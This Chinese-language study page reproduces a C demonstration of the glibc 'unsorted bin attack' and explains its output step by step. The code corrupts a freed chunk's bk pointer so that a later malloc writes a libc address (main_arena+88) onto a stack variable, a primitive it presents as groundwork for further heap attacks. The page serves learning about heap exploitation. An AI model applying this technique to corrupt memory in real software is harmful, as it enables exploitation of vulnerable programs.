源代码
1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main(){ 5 fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n"); 6 fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the " 7 "global variable global_max_fast in libc for further fastbin attack\n\n"); 8 9 unsigned long stack_var=0; 10 fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n"); 11 fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var); 12 13 unsigned long *p=malloc(400); 14 fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p); 15 fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with" 16 "the first one during the free()\n\n"); 17 malloc(500); 18 19 free(p); 20 fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer " 21 "point to %p\n",(void*)p[1]); 22 23 //------------VULNERABILITY----------- 24 25 p[1]=(unsigned long)(&stack_var-2); 26 fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); 27 fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]); 28 29 //------------------------------------ 30 31 malloc(400); 32 fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been " 33 "rewritten:\n"); 34 fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var); 35 }
运行结果
首先在栈上申请了一个unsigned long类型的数var
接着申请了400字节的堆p,再申请一个500堆,防止p释放后和top chunk合并
然后释放p,p进入unsort bin
可以看到此时p的bk值为0x7ffff7dd1b78
将其改为var往低地址偏移16字节处
其实就是将var所在空间视为一个堆fake
var所在8字节即为fake数据部分前8字节
然后再次申请400字节内存,这次将分配已释放的p的空间
而p的bk所指的var的值会被修改为0x7ffff7dd1b78(这是值永远是main_arena+88)
是一个很大的unsigned long值
